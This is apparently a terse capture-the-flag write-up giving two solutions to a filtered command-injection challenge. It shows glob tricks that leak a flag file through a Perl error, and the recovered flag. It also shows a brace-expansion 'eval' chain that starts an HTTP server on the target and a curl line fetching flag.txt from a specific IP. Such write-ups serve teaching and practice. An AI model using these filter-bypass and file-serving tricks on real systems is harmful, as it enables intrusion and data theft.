Solution 1:
	od flag
		od: flag: No such file or directory
		The command has been executed. Let's go again!
	od flag.[a-z][a-z][a-z]
		The command has been executed. Let's go again!
	perl flag.[a-z][a-z][a-z] / perl flag.[r-u][w-y][r-u] (more precise)
		Can't locate object method "flag" via package "w3ll_th1s_f1l3_sh0uldnt_h4v3_fl4g_1n_2738372131" (perhaps you forgot to load "w3ll_th1s_f1l3_sh0uldnt_h4v3_fl4g_1n_2738372131"?) at flag.txt line 1.
		The command has been executed. Let's go again!

Solution 2:
	eval eval py{r..u}hon3.8\\ -m\\ h{r..u}{r..u}p.{r..u}erver\\ 4545\\;

	curl http://207.180.200.166:4545/flag.txt